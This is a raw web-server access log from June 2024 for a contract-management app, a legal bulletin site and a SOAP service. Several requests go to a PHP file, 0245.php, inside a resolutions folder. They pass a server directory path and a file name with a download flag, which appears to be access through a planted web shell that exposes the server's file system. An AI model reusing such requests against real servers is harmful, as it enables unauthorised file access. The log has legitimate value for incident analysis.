181.63.25.20 - - [16/Jun/2024:22:35:09 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/adicionarSupervisor.xhtml HTTP/1.1" 200 16845
181.63.25.20 - - [16/Jun/2024:22:35:14 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:14 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/adicionarSupervisor.xhtml HTTP/1.1" 200 79314
181.63.25.20 - - [16/Jun/2024:22:35:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:22:33:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
47.128.99.2 - - [16/Jun/2024:22:35:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1-50&f=00000034.tif&ft=download HTTP/1.1" 200 244776
201.245.192.253 - - [16/Jun/2024:22:35:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.63.25.20 - - [16/Jun/2024:22:35:27 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 155214
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:28 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
181.63.25.20 - - [16/Jun/2024:22:35:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 61864
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:35:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
47.128.111.94 - - [16/Jun/2024:22:35:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=2000+350-399.tif&ft=download HTTP/1.1" 200 97950
172.22.2.4 - - [16/Jun/2024:22:36:15 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [16/Jun/2024:22:36:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.63.25.20 - - [16/Jun/2024:22:36:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32905
47.128.45.165 - - [16/Jun/2024:22:36:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2151-2200&f=00002193.tif&ft=download HTTP/1.1" 200 160940
201.245.192.253 - - [16/Jun/2024:22:36:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36441
201.245.192.253 - - [16/Jun/2024:22:36:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34554
201.245.192.253 - - [16/Jun/2024:22:37:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.20 - - [16/Jun/2024:22:37:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4630.pdf&ft=download&white=1 HTTP/1.1" 200 376487
47.128.16.166 - - [16/Jun/2024:22:38:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300&f=00001270.tif&ft=download HTTP/1.1" 200 158616
201.245.192.253 - - [16/Jun/2024:22:38:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.244 - - [16/Jun/2024:22:38:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1211.pdf&ft=download&white=1 HTTP/1.1" 200 392871
201.245.192.253 - - [16/Jun/2024:22:38:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34439
